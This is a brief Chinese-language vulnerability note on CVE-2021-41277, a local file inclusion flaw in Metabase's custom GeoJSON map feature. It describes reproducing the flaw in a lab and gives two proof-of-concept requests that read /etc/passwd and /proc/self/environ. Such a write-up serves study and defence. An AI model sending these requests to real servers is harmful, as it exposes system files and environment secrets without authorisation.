漏洞信息
Metabase是美国Metabase公司的一个开源数据分析平台。
Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。
CNNVD编号:CNNVD-202111-1565
危害等级: 超危
CVE编号: CVE-2021-41277
简述: 在受影响的版本中,自定义GeoJSON地图(' admin->settings->maps->custom maps->add a map ')存在本地文件包含(包括环境变量)漏洞,url在加载之前没有经过验证,攻击者利用该漏洞能够读取任意文件。
漏洞复现
进入靶场环境
注册一个账号,跳过数据库
进入如下界面
poc
/api/geojson?url=file:etc/passwd
但是有的前端解析是乱码,也可以抓包之后进行操作
/api/geojson?url=file:///proc/self/environ